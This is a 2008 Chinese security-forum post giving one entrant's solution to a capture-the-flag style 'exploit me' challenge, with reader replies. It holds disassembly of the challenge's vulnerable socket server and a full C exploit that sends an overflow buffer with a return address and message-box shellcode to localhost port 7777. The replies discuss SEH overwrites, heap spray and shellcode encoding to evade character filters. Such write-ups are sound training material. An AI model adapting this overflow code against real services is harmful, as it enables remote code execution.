首页
社区
课程
招聘
[原创]辞旧迎新exploit me挑战赛我的答案
发表于: 2008-1-2 07:06 9200

[原创]辞旧迎新exploit me挑战赛我的答案

2008-1-2 07:06
9200

提交时间已经过了,那么我就可以发帖子混篇精华了。首先我声明,溢出我是个门外汉,答案不一定正确,仅供参考。

首先看A题,打开OD,看到EP处的代码



不用怀疑,它是标准的VC6.0生成的.OK,水话说完了 .
我们直接来看看main()函数的代码.

004010B0  /$  81EC B4030000 sub     esp, 3B4
004010B6  |.  8D8424 240200>lea     eax, dword ptr [esp+224]
004010BD  |.  55            push    ebp
004010BE  |.  50            push    eax                              ; /pWSAData
004010BF  |.  68 01010000   push    101                              ; |RequestedVersion = 101 (1.1.)
004010C4  |.  FF15 BC804000 call    dword ptr [<&WS2_32.#115>]       ; \WSAStartup
004010CA  |.  6A 00         push    0                                ; /Protocol = IPPROTO_IP
004010CC  |.  6A 01         push    1                                ; |Type = SOCK_STREAM
004010CE  |.  6A 02         push    2                                ; |Family = AF_INET
004010D0  |.  FF15 C0804000 call    dword ptr [<&WS2_32.#23>]        ; \socket
004010D6  |.  8BE8          mov     ebp, eax
004010D8  |.  85ED          test    ebp, ebp
004010DA  |.  7D 33         jge     short 0040110F
004010DC  |.  68 00914000   push    00409100                         ;  ASCII "socket creating error!"
004010E1  |.  55            push    ebp                              ; /Arg1
004010E2  |.  B9 689A4000   mov     ecx, 00409A68                    ; |
004010E7  |.  E8 0C070000   call    004017F8                         ; \exploit_.004017F8
004010EC  |.  8BC8          mov     ecx, eax
004010EE  |.  E8 34030000   call    00401427
004010F3  |.  68 D0124000   push    004012D0
004010F8  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
004010FA  |.  8BC8          mov     ecx, eax                         ; |
004010FC  |.  E8 DF010000   call    004012E0                         ; \exploit_.004012E0
00401101  |.  8BC8          mov     ecx, eax
00401103  |.  E8 A8010000   call    004012B0
00401108  |.  6A 01         push    1
0040110A  |.  E8 430E0000   call    00401F52
0040110F  |>  68 611E0000   push    1E61                             ; /NetShort = 1E61
00401114  |.  66:C74424 0C >mov     word ptr [esp+C], 2              ; |
0040111B  |.  FF15 C4804000 call    dword ptr [<&WS2_32.#9>]         ; \ntohs
00401121  |.  6A 00         push    0                                ; /NetLong = 0
00401123  |.  66:894424 0E  mov     word ptr [esp+E], ax             ; |
00401128  |.  FF15 C8804000 call    dword ptr [<&WS2_32.#8>]         ; \ntohl
0040112E  |.  8D4C24 08     lea     ecx, dword ptr [esp+8]
00401132  |.  6A 10         push    10                               ; /AddrLen = 10 (16.)
00401134  |.  51            push    ecx                              ; |pSockAddr
00401135  |.  55            push    ebp                              ; |Socket
00401136  |.  894424 18     mov     dword ptr [esp+18], eax          ; |
0040113A  |.  FF15 CC804000 call    dword ptr [<&WS2_32.#2>]         ; \bind
00401140  |.  85C0          test    eax, eax
00401142  |.  74 24         je      short 00401168
00401144  |.  68 E0904000   push    004090E0                         ;  ASCII "binding stream socket error!"
00401149  |.  B9 689A4000   mov     ecx, 00409A68
0040114E  |.  E8 D4020000   call    00401427
00401153  |.  68 D0124000   push    004012D0
00401158  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
0040115A  |.  8BC8          mov     ecx, eax                         ; |
0040115C  |.  E8 7F010000   call    004012E0                         ; \exploit_.004012E0
00401161  |.  8BC8          mov     ecx, eax
00401163  |.  E8 48010000   call    004012B0
00401168  |>  53            push    ebx
00401169  |.  68 B8904000   push    004090B8                         ;  ASCII "**************************************"
0040116E  |.  B9 689A4000   mov     ecx, 00409A68
00401173  |.  E8 AF020000   call    00401427
00401178  |.  68 D0124000   push    004012D0
0040117D  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
0040117F  |.  8BC8          mov     ecx, eax                         ; |
00401181  |.  E8 5A010000   call    004012E0                         ; \exploit_.004012E0
00401186  |.  8BC8          mov     ecx, eax
00401188  |.  E8 23010000   call    004012B0
0040118D  |.  68 94904000   push    00409094                         ;  ASCII "     exploit target server 1.0",TAB,"   "
00401192  |.  B9 689A4000   mov     ecx, 00409A68
00401197  |.  E8 8B020000   call    00401427
0040119C  |.  68 D0124000   push    004012D0
004011A1  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
004011A3  |.  8BC8          mov     ecx, eax                         ; |
004011A5  |.  E8 36010000   call    004012E0                         ; \exploit_.004012E0
004011AA  |.  8BC8          mov     ecx, eax
004011AC  |.  E8 FF000000   call    004012B0
004011B1  |.  68 B8904000   push    004090B8                         ;  ASCII "**************************************"
004011B6  |.  B9 689A4000   mov     ecx, 00409A68
004011BB  |.  E8 67020000   call    00401427
004011C0  |.  68 D0124000   push    004012D0
004011C5  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
004011C7  |.  8BC8          mov     ecx, eax                         ; |
004011C9  |.  E8 12010000   call    004012E0                         ; \exploit_.004012E0
004011CE  |.  8BC8          mov     ecx, eax
004011D0  |.  E8 DB000000   call    004012B0
004011D5  |.  6A 04         push    4                                ; /Backlog = 4
004011D7  |.  55            push    ebp                              ; |Socket
004011D8  |.  FF15 D0804000 call    dword ptr [<&WS2_32.#13>]        ; \listen
004011DE  |.  8D5424 08     lea     edx, dword ptr [esp+8]
004011E2  |.  8D4424 1C     lea     eax, dword ptr [esp+1C]
004011E6  |.  52            push    edx                              ; /pAddrLen
004011E7  |.  50            push    eax                              ; |pSockAddr
004011E8  |.  55            push    ebp                              ; |Socket
004011E9  |.  C74424 14 100>mov     dword ptr [esp+14], 10           ; |
004011F1  |.  FF15 D4804000 call    dword ptr [<&WS2_32.#1>]         ; \accept
004011F7  |.  8BD8          mov     ebx, eax
004011F9  |.  83FB FF       cmp     ebx, -1
004011FC  |.  74 7F         je      short 0040127D
004011FE  |.  56            push    esi
004011FF  |.  57            push    edi
00401200  |>  B9 80000000   /mov     ecx, 80
00401205  |.  33C0          |xor     eax, eax
00401207  |.  8D7C24 34     |lea     edi, dword ptr [esp+34]
0040120B  |.  50            |push    eax                             ; /Flags => 0
0040120C  |.  F3:AB         |rep     stos dword ptr es:[edi]         ; |
0040120E  |.  8D4C24 38     |lea     ecx, dword ptr [esp+38]         ; |
00401212  |.  68 00020000   |push    200                             ; |BufSize = 200 (512.)
00401217  |.  51            |push    ecx                             ; |Buffer
00401218  |.  53            |push    ebx                             ; |Socket
00401219  |.  FF15 D8804000 |call    dword ptr [<&WS2_32.#16>]       ; \recv
0040121F  |.  8BF0          |mov     esi, eax
00401221  |.  85F6          |test    esi, esi
00401223  |.  7D 26         |jge     short 0040124B
00401225  |.  68 74904000   |push    00409074                        ;  ASCII "reading stream message erro!"
0040122A  |.  B9 689A4000   |mov     ecx, 00409A68
0040122F  |.  E8 F3010000   |call    00401427
00401234  |.  68 D0124000   |push    004012D0
00401239  |.  6A 0A         |push    0A                              ; /Arg1 = 0000000A
0040123B  |.  8BC8          |mov     ecx, eax                        ; |
0040123D  |.  E8 9E000000   |call    004012E0                        ; \exploit_.004012E0
00401242  |.  8BC8          |mov     ecx, eax
00401244  |.  E8 67000000   |call    004012B0
00401249  |.  33F6          |xor     esi, esi
0040124B  |>  8D5424 34     |lea     edx, dword ptr [esp+34]
0040124F  |.  52            |push    edx
00401250  |.  E8 ABFDFFFF   |call    00401000
00401255  |.  83C4 04       |add     esp, 4
00401258  |.  85F6          |test    esi, esi
0040125A  |.^ 75 A4         |jnz     short 00401200
0040125C  |.  53            |push    ebx                             ; /Socket
0040125D  |.  FF15 DC804000 |call    dword ptr [<&WS2_32.#3>]        ; \closesocket
00401263  |.  8D4424 10     |lea     eax, dword ptr [esp+10]
00401267  |.  8D4C24 24     |lea     ecx, dword ptr [esp+24]
0040126B  |.  50            |push    eax                             ; /pAddrLen
0040126C  |.  51            |push    ecx                             ; |pSockAddr
0040126D  |.  55            |push    ebp                             ; |Socket
0040126E  |.  FF15 D4804000 |call    dword ptr [<&WS2_32.#1>]        ; \accept
00401274  |.  8BD8          |mov     ebx, eax
00401276  |.  83FB FF       |cmp     ebx, -1
00401279  |.^ 75 85         \jnz     short 00401200
0040127B  |.  5F            pop     edi
0040127C  |.  5E            pop     esi
0040127D  |>  68 64904000   push    00409064                         ;  ASCII "accept error!"
00401282  |.  B9 689A4000   mov     ecx, 00409A68
00401287  |.  E8 9B010000   call    00401427
0040128C  |.  68 D0124000   push    004012D0
00401291  |.  6A 0A         push    0A                               ; /Arg1 = 0000000A
00401293  |.  8BC8          mov     ecx, eax                         ; |
00401295  |.  E8 46000000   call    004012E0                         ; \exploit_.004012E0
0040129A  |.  8BC8          mov     ecx, eax
0040129C  |.  E8 0F000000   call    004012B0
004012A1  |.  FF15 E0804000 call    dword ptr [<&WS2_32.#116>]       ; [WSACleanup
004012A7  |.  5B            pop     ebx
004012A8  |.  5D            pop     ebp
004012A9  |.  81C4 B4030000 add     esp, 3B4
004012AF  \.  C3            retn
// exploitA.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")

BYTE shellcode[0x200] =
{
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
	"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xED\x1E\x96\x7C"
	"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
	"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
	"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
	"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
	"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
	"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
	"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
	"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
	"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
	"\x53\x68\x6F\x68\x6F\x0A\x68\x62\x75\x67\x68\x8B\xC4\x53\x50\x50"
	"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
};
int _tmain(int argc, _TCHAR* argv[])
{
	WORD version;
	WSADATA wsaData;
	int rVal=0;

	version = MAKEWORD(1,1);

	WSAStartup(version,(LPWSADATA)&wsaData);

	LPHOSTENT hostEntry;

	//store information about the server
	hostEntry = gethostbyname("127.0.0.1");

	if(!hostEntry)
	{
		printf("Failed gethostbyname()");
		WSACleanup();
		return 0;
	}

	//create the socket
	SOCKET theSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

	if(theSocket == SOCKET_ERROR)
	{
		printf("Failed socket()");
		return 0;
	}

	//Fill in the sockaddr_in struct
	SOCKADDR_IN serverInfo;

	serverInfo.sin_family = PF_INET;
	serverInfo.sin_addr = *((LPIN_ADDR)*hostEntry->h_addr_list);

	serverInfo.sin_port = htons(7777);

	rVal=connect(theSocket,(LPSOCKADDR)&serverInfo, sizeof(serverInfo));
	if(rVal==SOCKET_ERROR)
	{
		printf("Failed connect()");
		return 0;
	}
	send(theSocket,(const char*)shellcode,0x200,0);
	return 0;
}

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

上传的附件:
收藏
免费 7
支持
分享
最新回复 (27)
雪    币: 479
活跃值: (25)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
2
我被字符过滤卡住了,结果第二题没做出来。楼上第二题答案在我的机器没弹出窗口。其还可以溢出后覆盖SEH,得用SEH将jmp  esp 弹入eip,我也找到地方了,就是字符过滤没解决好,这下学到了。
2008-1-2 08:35
0
雪    币: 260
活跃值: (102)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
3
WideCharToMultiByte真烦人,折腾了我好久!
2008-1-2 08:52
0
雪    币: 1946
活跃值: (258)
能力值: (RANK:330 )
在线值:
发帖
回帖
粉丝
4
论坛上代码显示不正确,用那个在线测试试试
2008-1-2 08:58
0
雪    币: 246
活跃值: (10)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
5
呵呵,这次比赛看好楼主了

学习ing......
2008-1-2 09:02
0
雪    币: 7325
活跃值: (3803)
能力值: (RANK:1130 )
在线值:
发帖
回帖
粉丝
6
学习!

这次你好像没有F5
2008-1-2 09:25
0
雪    币: 211
活跃值: (18)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
学习学习

AppName: iexplore.exe         AppVer: 6.0.2900.2180         ModName: unknown
ModVer: 0.0.0.0         Offset: b15ff6ab
2008-1-2 09:26
0
雪    币: 116
活跃值: (220)
能力值: ( LV12,RANK:370 )
在线值:
发帖
回帖
粉丝
8
学习。。。精彩
2008-1-2 09:28
0
雪    币: 112
活跃值: (16)
能力值: ( LV9,RANK:290 )
在线值:
发帖
回帖
粉丝
9
我看好你
2008-1-2 09:35
0
雪    币: 1946
活跃值: (258)
能力值: (RANK:330 )
在线值:
发帖
回帖
粉丝
10
你跟很黑打地铁回去的?



我也看好你



这2个题不需要F5
2008-1-2 09:38
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
我也发现是pdg,google查7F5E27C1-4A5C-11D3-9232-0000B48A05B2
初学者,不知怎么调试.第二题能讲细点不?不明白
2008-1-2 10:05
0
雪    币: 221
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
nop
12
字符过滤 最简单就用heap spray绕过去
或者用unicode shellcode
2008-1-2 10:13
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
学习,关注!!!!
2008-1-2 10:16
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
偶看好你too
2008-1-2 10:17
0
雪    币: 8209
活跃值: (4523)
能力值: ( LV15,RANK:2473 )
在线值:
发帖
回帖
粉丝
15
很好,很愉快
2008-1-2 10:24
0
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
都是牛人啊!!我OD都还不太熟悉呢!!等我搞完了。再仔细看大虾的贴子吧
2008-1-2 10:30
0
雪    币: 240
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
在oleaut32.dll的DispCallFunc函数上下断..

学到一招
2008-1-2 10:36
0
雪    币: 381
活跃值: (140)
能力值: ( LV13,RANK:330 )
在线值:
发帖
回帖
粉丝
18
我也是在此处卡住,以前没想过要搞溢出,漏洞是发现了,写起SHELL才发现不是那么容易
2008-1-2 12:09
0
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
19
不能跨平台,wchar不是问题,用alpha2或者pgp编码就行
2008-1-2 12:12
0
雪    币: 1505
能力值: (RANK:210 )
在线值:
发帖
回帖
粉丝
20
学习学习
2008-1-2 13:04
0
雪    币: 321
活跃值: (271)
能力值: ( LV13,RANK:1050 )
在线值:
发帖
回帖
粉丝
21
2008-1-2 13:06
0
雪    币: 926
活跃值: (397)
能力值: (RANK:500 )
在线值:
发帖
回帖
粉丝
22
不知LZ测试没
我发现
void SetUserAuth(
                [in] BSTR UserName,
                [in] BSTR Password);
第2个参数也有溢出的问题
2008-1-2 14:07
0
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
23
腰好  腰愉快
2008-1-2 14:32
0
雪    币: 146
活跃值: (33)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
24
-.-楼主拿到书了拿手机拍几张看看...
2008-1-2 14:51
0
雪    币: 1946
活跃值: (258)
能力值: (RANK:330 )
在线值:
发帖
回帖
粉丝
25
你指的跨哪种平台?

编码不是问题,写译码器就行。
2008-1-2 16:51
0
游客
登录 | 注册 方可回帖
返回
//